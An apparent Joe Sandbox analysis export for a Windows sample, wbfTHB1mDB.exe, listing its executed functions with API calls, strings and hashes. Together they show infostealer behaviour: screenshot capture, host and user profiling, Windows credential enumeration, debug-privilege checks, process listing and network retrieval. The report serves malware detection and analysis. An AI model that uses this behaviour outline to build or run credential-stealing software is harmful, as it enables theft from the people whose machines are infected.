Memory Dump Source

Source File: 00000003.00000002.2426084094.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: pij$pij$J$l$J$l
API String ID: 0-2109838555
Opcode ID: 7e205cfbf04aacb59183826a8d2b11d890c72ddc5dcba0d1b1b3194aa776dfce
Instruction ID: f143d04f16f2adc7415a3765138bad2599e4df50d012bb31ee52c115a81c264c
Opcode Fuzzy Hash: 7e205cfbf04aacb59183826a8d2b11d890c72ddc5dcba0d1b1b3194aa776dfce
Instruction Fuzzy Hash: 62218EB291422EDFDB208F15C1456EABBF4FB46329F18C467F8188B551C739D984CBA1

Analysis Process: wbfTHB1mDB.exePID: 4616, Parent PID: 988COMMON

Execution Graph

Execution Coverage:	6.7%
Dynamic/Decrypted Code Coverage:	83.1%
Signature Coverage:	5.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	117

Executed Functions

Function 0000018C89A8FB30 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 225
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 0000018C89A8FB71
GetSystemMetrics.USER32 ref: 0000018C89A8FB7F
GetSystemMetrics.USER32 ref: 0000018C89A8FB8D
GetSystemMetrics.USER32 ref: 0000018C89A8FB9B
GetDC.USER32 ref: 0000018C89A8FBA5
GetDeviceCaps.GDI32 ref: 0000018C89A8FBBB
GetDeviceCaps.GDI32 ref: 0000018C89A8FBCB
CreateCompatibleDC.GDI32 ref: 0000018C89A8FBD8
CreateCompatibleBitmap.GDI32 ref: 0000018C89A8FBF0
SelectObject.GDI32 ref: 0000018C89A8FC06
BitBlt.GDI32 ref: 0000018C89A8FC3C
SHCreateMemStream.SHLWAPI ref: 0000018C89A8FC72
SelectObject.GDI32 ref: 0000018C89A8FC88
DeleteDC.GDI32 ref: 0000018C89A8FC91
ReleaseDC.USER32 ref: 0000018C89A8FC9C
DeleteObject.GDI32 ref: 0000018C89A8FCA5
EnterCriticalSection.KERNEL32 ref: 0000018C89A8FD9C
LeaveCriticalSection.KERNEL32 ref: 0000018C89A8FDAE
IStream_Size.SHLWAPI ref: 0000018C89A8FDE5
IStream_Reset.SHLWAPI ref: 0000018C89A8FDF6
IStream_Read.SHLWAPI ref: 0000018C89A8FE7B
SelectObject.GDI32 ref: 0000018C89A8FED5
DeleteDC.GDI32 ref: 0000018C89A8FEDE
ReleaseDC.USER32 ref: 0000018C89A8FEEB
DeleteObject.GDI32 ref: 0000018C89A8FEF4

Strings

, xrefs: 0000018C89A8FC11

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Object$DeleteMetricsSystem$CreateSelectStream_$CapsCompatibleCriticalDeviceReleaseSection$BitmapEnterLeaveReadResetSizeStream
String ID:
API String ID: 3214587331-3916222277
Opcode ID: e8e9b911cd9b9f557c011d0a693391b94df579aa06795856880fde4b09ecdcd5
Instruction ID: bab5ecb66eaafef95db6bebabd6c946f6e737d1a6107a5d92eefc6142da7e31c
Opcode Fuzzy Hash: e8e9b911cd9b9f557c011d0a693391b94df579aa06795856880fde4b09ecdcd5
Instruction Fuzzy Hash: D1B15E72248BC086E760DB21E8543DEB3A5F78AB80F40C515DE8953B69DF7CC689CB90

Function 0000018C89AC98C0 Relevance: 27.2, APIs: 18, Instructions: 229
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesExW.KERNEL32 ref: 0000018C89AC996D
GetLastError.KERNEL32 ref: 0000018C89AC9977
FindFirstFileW.KERNEL32 ref: 0000018C89AC998E
GetLastError.KERNEL32 ref: 0000018C89AC999A
FindClose.KERNEL32 ref: 0000018C89AC99A8
__std_fs_open_handle.LIBCPMT ref: 0000018C89AC9A3B
CloseHandle.KERNEL32 ref: 0000018C89AC9A51
CloseHandle.KERNEL32 ref: 0000018C89AC9BC4

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handle
String ID:
API String ID: 2398595512-0
Opcode ID: 9b9cafa6476ba7d57e6375b49b2d31870033937920a690a77e8b0d8031f3f21f
Instruction ID: d10501a590d61909671144f86026f37b3c36a5dee92c6bfc7bf9b3d3b70cab6f
Opcode Fuzzy Hash: 9b9cafa6476ba7d57e6375b49b2d31870033937920a690a77e8b0d8031f3f21f
Instruction Fuzzy Hash: 8D91A631380A41C6EB748B25A4447D97391A7C7B78F16C3149E765B7D4DF38CB0987A0

Function 0000018C89A91660 Relevance: 26.6, APIs: 4, Strings: 10, Instructions: 2133timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32 ref: 0000018C89A91990

Strings

time, xrefs: 0000018C89A93041
computer_name, xrefs: 0000018C89A92954
ram, xrefs: 0000018C89A9285B
cpu, xrefs: 0000018C89A92618
system, xrefs: 0000018C89A923E4, 0000018C89A924D3, 0000018C89A925C9, 0000018C89A926C3, 0000018C89A9280B, 0000018C89A92905, 0000018C89A929F8, 0000018C89A92B7F, 0000018C89A92D70, 0000018C89A92FF1, 0000018C89A931B4, 0000018C89A933CE, 0000018C89A9356D, 0000018C89A93717, 0000018C89A937DD
%d-%m-%Y, %H:%M:%S, xrefs: 0000018C89A92F5F
user_name, xrefs: 0000018C89A9242F
[UTC, xrefs: 0000018C89A91963
gpu, xrefs: 0000018C89A92522
timezone, xrefs: 0000018C89A93414

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: InformationTimeZone
String ID: %d-%m-%Y, %H:%M:%S$[UTC$computer_name$cpu$gpu$ram$system$time$timezone$user_name
API String ID: 565725191-1610854563
Opcode ID: b5da158b1f0096e16ca8eea67f0798ebb98cfa18b5d165cf00807be149d7d708
Instruction ID: cecc8930f08a972ff8ee89c8593130154cb2574dc10255005448c8f6ab292525
Opcode Fuzzy Hash: b5da158b1f0096e16ca8eea67f0798ebb98cfa18b5d165cf00807be149d7d708
Instruction Fuzzy Hash: 22239D33654BC089EB20CB65E8903DD77A1F78A798F50D216EA9D07BA9DF78C284C750

Function 0000018C89A91FF0 Relevance: 22.5, APIs: 3, Strings: 9, Instructions: 1516COMMON

Download Yara Rule

APIs

Part of subcall function 0000018C89A90C30: GetCurrentHwProfileW.ADVAPI32 ref: 0000018C89A90C6C

Part of subcall function 0000018C89A90500: EnumDisplayDevicesW.USER32 ref: 0000018C89A90617
Part of subcall function 0000018C89A90500: EnumDisplayDevicesW.USER32 ref: 0000018C89A906BB

Part of subcall function 0000018C89A90420: RegGetValueA.ADVAPI32 ref: 0000018C89A90489

Part of subcall function 0000018C89A90110: GetUserNameW.ADVAPI32 ref: 0000018C89A90155

Part of subcall function 0000018C89A901B0: GetComputerNameW.KERNEL32 ref: 0000018C89A901F5

GlobalMemoryStatusEx.KERNEL32 ref: 0000018C89A9277C
wcsftime.LIBCMT ref: 0000018C89A92F72
GetModuleFileNameA.KERNEL32 ref: 0000018C89A93106

Strings

time, xrefs: 0000018C89A93041
computer_name, xrefs: 0000018C89A92954
ram, xrefs: 0000018C89A9285B
cpu, xrefs: 0000018C89A92618
system, xrefs: 0000018C89A923E4, 0000018C89A924D3, 0000018C89A925C9, 0000018C89A926C3, 0000018C89A9280B, 0000018C89A92905, 0000018C89A929F8, 0000018C89A92B7F, 0000018C89A92D70, 0000018C89A92FF1, 0000018C89A931B4, 0000018C89A933CE, 0000018C89A9356D, 0000018C89A93717, 0000018C89A937DD
%d-%m-%Y, %H:%M:%S, xrefs: 0000018C89A92F5F
user_name, xrefs: 0000018C89A9242F
gpu, xrefs: 0000018C89A92522
timezone, xrefs: 0000018C89A93414

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Name$DevicesDisplayEnum$ComputerCurrentFileGlobalMemoryModuleProfileStatusUserValuewcsftime
String ID: %d-%m-%Y, %H:%M:%S$computer_name$cpu$gpu$ram$system$time$timezone$user_name
API String ID: 2509368203-1182675529
Opcode ID: 2d98b574a16708c24a81e4507e2385a48d6d094c7c27c9b50a3062811e555029
Instruction ID: 7adeae8d6d482f17cd5688916fcf97474f846c83f30465263adeeab52039b210
Opcode Fuzzy Hash: 2d98b574a16708c24a81e4507e2385a48d6d094c7c27c9b50a3062811e555029
Instruction Fuzzy Hash: B7F27C32654BC089DB21CF65E8903DD77A1F78A798F40D216EA9D07BA9DF78C288C750

Function 0000018C89A4B820 Relevance: 20.1, APIs: 8, Strings: 3, Instructions: 862
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 0000018C89A4B90C
GetProcAddress.KERNEL32 ref: 0000018C89A4BA17
GetProcAddress.KERNEL32 ref: 0000018C89A4BAD9
GetProcAddress.KERNEL32 ref: 0000018C89A4BB53
GetProcAddress.KERNEL32 ref: 0000018C89A4BBD5
GetProcAddress.KERNEL32 ref: 0000018C89A4BC4F
GetProcAddress.KERNEL32 ref: 0000018C89A4BCD3
FreeLibrary.KERNEL32 ref: 0000018C89A4C801

Strings

cannot use push_back() with , xrefs: 0000018C89A4C84F
system, xrefs: 0000018C89A4C60D
vault, xrefs: 0000018C89A4C663

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: cannot use push_back() with $system$vault
API String ID: 2449869053-1741236777
Opcode ID: c167f9ba354494a8f452c8618ae7afb5878c18a0dcb14da862df617fac09a7ba
Instruction ID: fa22804b7995ba2aa9f31a885c432f4dc4f5c66beeb5eab984ef5e3a3613ac1a
Opcode Fuzzy Hash: c167f9ba354494a8f452c8618ae7afb5878c18a0dcb14da862df617fac09a7ba
Instruction Fuzzy Hash: 38924B32245BC489DB608F29E8843DE73B4F78A798F508216DB9C5BB99EF74C694C350

Function 0000018C89A86480 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 173
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000018C89A89760: GetCurrentProcess.KERNEL32 ref: 0000018C89A8979B
Part of subcall function 0000018C89A89760: OpenProcessToken.ADVAPI32 ref: 0000018C89A897AE
Part of subcall function 0000018C89A89760: GetTokenInformation.ADVAPI32 ref: 0000018C89A897EA

ExitProcess.KERNEL32 ref: 0000018C89A864C7
OpenMutexA.KERNEL32 ref: 0000018C89A865E2
ExitProcess.KERNEL32 ref: 0000018C89A865F2
CreateMutexA.KERNEL32 ref: 0000018C89A86611
ExitProcess.KERNEL32 ref: 0000018C89A86637

Part of subcall function 0000018C89A89AA0: GetModuleFileNameW.KERNEL32 ref: 0000018C89A89AEA

Part of subcall function 0000018C89A94740: CoInitializeEx.OLE32 ref: 0000018C89A947AA

Strings

SeImpersonatePrivilege, xrefs: 0000018C89A864DA
SeDebugPrivilege, xrefs: 0000018C89A864CE

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Process$Exit$MutexOpenToken$CreateCurrentFileInformationInitializeModuleName
String ID: SeDebugPrivilege$SeImpersonatePrivilege
API String ID: 470559343-3768118664
Opcode ID: 892c72efa866d8bae7238c5194bb1e0cf259832a5c405ea9a6af87e01581db9d
Instruction ID: 87069c4f97714eae04de9da86e6605df28a205cb33d881cef8ed7ab34d62e6d1
Opcode Fuzzy Hash: 892c72efa866d8bae7238c5194bb1e0cf259832a5c405ea9a6af87e01581db9d
Instruction Fuzzy Hash: FC61B171684A8081FA20AB68E4563EE6394FBCB740F50D515FA9D52AD7DF38C34D87A0

Function 0000018C89AB114C Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 335
timeCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 0000018C89AB1191

Part of subcall function 0000018C89AB07F8: _invalid_parameter_noinfo.LIBCMT ref: 0000018C89AB080C

Part of subcall function 0000018C89AAB550: HeapFree.KERNEL32 ref: 0000018C89AAB566
Part of subcall function 0000018C89AAB550: GetLastError.KERNEL32 ref: 0000018C89AAB570

Part of subcall function 0000018C89AB9D94: _invalid_parameter_noinfo.LIBCMT ref: 0000018C89AB9CDF

_get_daylight.LIBCMT ref: 0000018C89AB1180

Part of subcall function 0000018C89AB0858: _invalid_parameter_noinfo.LIBCMT ref: 0000018C89AB086C

_get_daylight.LIBCMT ref: 0000018C89AB13F6
_get_daylight.LIBCMT ref: 0000018C89AB1407
_get_daylight.LIBCMT ref: 0000018C89AB1418
GetTimeZoneInformation.KERNEL32 ref: 0000018C89AB143F

Strings

Eastern Standard Time, xrefs: 0000018C89AB14E5
Eastern Summer Time, xrefs: 0000018C89AB14FD

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 355007559-239921721
Opcode ID: 7c59d7ccbe5d7300b5b7a10bdfa8df02b94e7a90d3a9da5a0b2f52bbfcd600ed
Instruction ID: c9849ecec3db203fce2d0bd3c65116f10fc30ba2cdc72189562744e5c9b3e37a
Opcode Fuzzy Hash: 7c59d7ccbe5d7300b5b7a10bdfa8df02b94e7a90d3a9da5a0b2f52bbfcd600ed
Instruction Fuzzy Hash: ABD1F57678025096EB60EF26D8903E977A1F787B84F44C126EE4947A85EF38C649C7E0

Function 0000018C89A8F200 Relevance: 13.9, APIs: 9, Instructions: 408
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET ref: 0000018C89A8F3CB
InternetOpenUrlA.WININET ref: 0000018C89A8F4A8
HttpQueryInfoW.WININET ref: 0000018C89A8F509
HttpQueryInfoW.WININET ref: 0000018C89A8F5A2
InternetQueryDataAvailable.WININET ref: 0000018C89A8F5E6
InternetReadFile.WININET ref: 0000018C89A8F6A9
InternetQueryDataAvailable.WININET ref: 0000018C89A8F774
InternetCloseHandle.WININET ref: 0000018C89A8F81E
Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A8F87B

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Internet$Query$AvailableDataHttpInfoOpen$CloseConcurrency::cancel_current_taskFileHandleRead
String ID:
API String ID: 1475545111-0
Opcode ID: ffe244b6c42aee15dbd446d1d075a668424d0b6c37b765fbbf812ef4fa688032
Instruction ID: 15a2301903a89921220dd15b553a7ef83823a813fc699b56435096c83fc305ee
Opcode Fuzzy Hash: ffe244b6c42aee15dbd446d1d075a668424d0b6c37b765fbbf812ef4fa688032
Instruction Fuzzy Hash: DA02A132A14B9585EB10CB69E8403EE77B4F786B98F208215EE9C57B98DF78C185C790

Function 0000018C89ACE968 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000018C89ACE54C: _invalid_parameter_noinfo.LIBCMT ref: 0000018C89ACE58D
Part of subcall function 0000018C89ACE54C: _invalid_parameter_noinfo.LIBCMT ref: 0000018C89ACE60B
Part of subcall function 0000018C89ACE54C: _invalid_parameter_noinfo.LIBCMT ref: 0000018C89ACE65C

CreateFileW.KERNEL32 ref: 0000018C89ACEA6E
CreateFileW.KERNEL32 ref: 0000018C89ACEABE
GetLastError.KERNEL32 ref: 0000018C89ACEAEE
GetFileType.KERNEL32 ref: 0000018C89ACEB03
GetLastError.KERNEL32 ref: 0000018C89ACEB0D
CloseHandle.KERNEL32 ref: 0000018C89ACEB40
CloseHandle.KERNEL32 ref: 0000018C89ACECA3
CreateFileW.KERNEL32 ref: 0000018C89ACECD8
GetLastError.KERNEL32 ref: 0000018C89ACECE7

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 484b9744f6cc28d441a3ba22cd2a9bb849a09fc1e06d845b9773f87c4c6ec638
Instruction ID: 278d2140c7ac1b9bd55a0cce4e439d532247a380085cd30e28c0535863a9c54c
Opcode Fuzzy Hash: 484b9744f6cc28d441a3ba22cd2a9bb849a09fc1e06d845b9773f87c4c6ec638
Instruction Fuzzy Hash: 01C1BF36764A4486EB10CFA9C4917EC37A1F34ABA8F12D215DF2A5B794CF38C659C390

Function 0000018C89A88F60 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 451
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileSize.KERNEL32 ref: 0000018C89A891A1
SetFilePointer.KERNEL32 ref: 0000018C89A89254
ReadFile.KERNEL32 ref: 0000018C89A89283

Strings

ios_base::eofbit set, xrefs: 0000018C89A896C4
exists, xrefs: 0000018C89A8970A
ios_base::failbit set, xrefs: 0000018C89A896BD
ios_base::badbit set, xrefs: 0000018C89A896B1, 0000018C89A8972F

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: File$PointerReadSize
String ID: exists$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 404940565-15404121
Opcode ID: 52089fa325ab67709650bd3530818ef13b96e455554b7ecc3ec1faaf5d6658fc
Instruction ID: 315d5e865c9f981b493ca2a6e1a06f91e6c77ab6baf8b2a56654e581aae8ccb9
Opcode Fuzzy Hash: 52089fa325ab67709650bd3530818ef13b96e455554b7ecc3ec1faaf5d6658fc
Instruction Fuzzy Hash: C132F532654BC489EB20CF34D8803ED37A1F786B88F54C226DA4D6BA99EF74C649C751

Function 0000018C89AB13C8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 0000018C89AB13F6

Part of subcall function 0000018C89AB0858: _invalid_parameter_noinfo.LIBCMT ref: 0000018C89AB086C

_get_daylight.LIBCMT ref: 0000018C89AB1407

Part of subcall function 0000018C89AB07F8: _invalid_parameter_noinfo.LIBCMT ref: 0000018C89AB080C

_get_daylight.LIBCMT ref: 0000018C89AB1418

Part of subcall function 0000018C89AB0828: _invalid_parameter_noinfo.LIBCMT ref: 0000018C89AB083C

Part of subcall function 0000018C89AAB550: HeapFree.KERNEL32 ref: 0000018C89AAB566
Part of subcall function 0000018C89AAB550: GetLastError.KERNEL32 ref: 0000018C89AAB570

GetTimeZoneInformation.KERNEL32 ref: 0000018C89AB143F

Strings

Eastern Standard Time, xrefs: 0000018C89AB14E5
Eastern Summer Time, xrefs: 0000018C89AB14FD

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
Opcode ID: 94df1ec9e2384a72c79be9da220bb4aa566035efaa8ab6aaac74d351b0b15fee
Instruction ID: 47f08564aef162852e991f305d0d0595c9672e7df5ba736be5c5d0929fb33e33
Opcode Fuzzy Hash: 94df1ec9e2384a72c79be9da220bb4aa566035efaa8ab6aaac74d351b0b15fee
Instruction Fuzzy Hash: E351A5723406409AE720DF35E9917DA77A0F78B784F44C226EA4A47B95DF38C649C7E0

Function 0000018C89AA749C Relevance: 9.2, APIs: 6, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000018C89AA74BE
_get_daylight.LIBCMT ref: 0000018C89AA751E
_get_daylight.LIBCMT ref: 0000018C89AA752F
_get_daylight.LIBCMT ref: 0000018C89AA7540
_isindst.LIBCMT ref: 0000018C89AA7591
_isindst.LIBCMT ref: 0000018C89AA75E4

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
String ID:
API String ID: 1405656091-0
Opcode ID: 842d06e59cb7d0c874962108e89d6781c57040cb1ba9c53ec58eb2fa30030a5a
Instruction ID: 1a65f7801c2b2dd8d9ef65e232d658c60e25ff5ca489e314bd2bcda6f454d310
Opcode Fuzzy Hash: 842d06e59cb7d0c874962108e89d6781c57040cb1ba9c53ec58eb2fa30030a5a
Instruction Fuzzy Hash: C181F5B3B402458FEB588F28C9413EDB7E5E759B88F04D039DA098B789EF38D6458790

Function 0000018C89A98B70 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 410
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__std_exception_destroy.LIBVCRUNTIME ref: 0000018C89A98D24
__std_exception_destroy.LIBVCRUNTIME ref: 0000018C89A98D32
__std_exception_destroy.LIBVCRUNTIME ref: 0000018C89A98FB5
__std_exception_destroy.LIBVCRUNTIME ref: 0000018C89A98FC3

Strings

value, xrefs: 0000018C89A98C4A, 0000018C89A98EE3

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: __std_exception_destroy
String ID: value
API String ID: 2453523683-494360628
Opcode ID: 14d9ae7af21bb851c47f3fd22c156565fba0ee0a8a7e1ec4c3f480d8e8873488
Instruction ID: 12975f7eb0b18b13969d2a8fcd30f8f773502b9f66f029844f55abb0b27722f7
Opcode Fuzzy Hash: 14d9ae7af21bb851c47f3fd22c156565fba0ee0a8a7e1ec4c3f480d8e8873488
Instruction Fuzzy Hash: FB029F32654BC099EB00CB78D4843ED6761F7867A4F50D205FAAE53ADADF78D289C390

Function 0000018C89A4C8C0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 328processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0000018C89A4C90A
Process32FirstW.KERNEL32 ref: 0000018C89A4C94C
Process32NextW.KERNEL32 ref: 0000018C89A4CB43
CloseHandle.KERNEL32 ref: 0000018C89A4CDBA

Strings

[PID: , xrefs: 0000018C89A4C98E

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID: [PID:
API String ID: 420147892-2210602247
Opcode ID: 692a2f0f82bbec5f96f200ac9e817d53d378791c0204cfc7e7c1c2a8526bc9bf
Instruction ID: c66d031167f7f331216aa83c6b5197166a1e7e240787e3ca7e04ca9312bb1402
Opcode Fuzzy Hash: 692a2f0f82bbec5f96f200ac9e817d53d378791c0204cfc7e7c1c2a8526bc9bf
Instruction Fuzzy Hash: AFE1A172654BC085EB20CB65E8843DE77A5F38A7A8F50C215EA9D07B99DF78C388C750

Function 0000018C89A95970 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0000018C89A959BE
OpenProcessToken.ADVAPI32 ref: 0000018C89A959D1
LookupPrivilegeValueW.ADVAPI32 ref: 0000018C89A959F2
AdjustTokenPrivileges.ADVAPI32 ref: 0000018C89A95A38
CloseHandle.KERNEL32 ref: 0000018C89A95A58

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: 29a02e95aae9899e0029659e102052f54fff5397b51cb33b914b83ea41570e5f
Instruction ID: 7925473a9eeee49629e523c24846d6b5d5279358d386d900d2a18f453c988015
Opcode Fuzzy Hash: 29a02e95aae9899e0029659e102052f54fff5397b51cb33b914b83ea41570e5f
Instruction Fuzzy Hash: 2A218032258B8086E760CF62F4543DAB3A0F789B90F55D125EE8943B58DF7DCA49CB90

Function 0000018C89A8E9F0 Relevance: 6.4, APIs: 4, Instructions: 417networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 0000018C89A8EBCC
recv.WS2_32 ref: 0000018C89A8F0AC
closesocket.WS2_32 ref: 0000018C89A8F0BE
WSACleanup.WS2_32 ref: 0000018C89A8F0C4

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: recv$Cleanupclosesocket
String ID:
API String ID: 146070474-0
Opcode ID: 3bb6c89ebcb32908706fa0ef85bc63c8d4f31b08de910938207502d1856dbfa0
Instruction ID: 50e3041fdff0b011ddfd72dd111894f3c39d15531b174ee28733487f1ee15eed
Opcode Fuzzy Hash: 3bb6c89ebcb32908706fa0ef85bc63c8d4f31b08de910938207502d1856dbfa0
Instruction Fuzzy Hash: 9212D573658BC081EA20DB14E4543EEA761F7CA790F50C211EAAD53ADADF78C689C790

Function 0000018C89A4ACC0 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 671COMMON

Download Yara Rule

APIs

CredEnumerateA.ADVAPI32 ref: 0000018C89A4AD22
CredFree.ADVAPI32 ref: 0000018C89A4B746

Strings

cannot use push_back() with , xrefs: 0000018C89A4B794

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Cred$EnumerateFree
String ID: cannot use push_back() with
API String ID: 3403564193-4122110429
Opcode ID: ef6894259491ba7fa13970ed290ecadd1b358bd49b56bbb1f92fd83456e94d20
Instruction ID: e6a15bbefccc64e8a7f9c5d905f69bab34bb4c7dbf6772bede43f5806442f7f6
Opcode Fuzzy Hash: ef6894259491ba7fa13970ed290ecadd1b358bd49b56bbb1f92fd83456e94d20
Instruction Fuzzy Hash: 49627072644BC489EB20CF65E8903DD77A1F38A798F50D215EAAD17B99DF38C288C750

Function 00007FF6A7047FD0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A704822F
__std_exception_copy.LIBVCRUNTIME ref: 00007FF6A7048298

Strings

1.3.1.zlib-ng, xrefs: 00007FF6A7048038

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
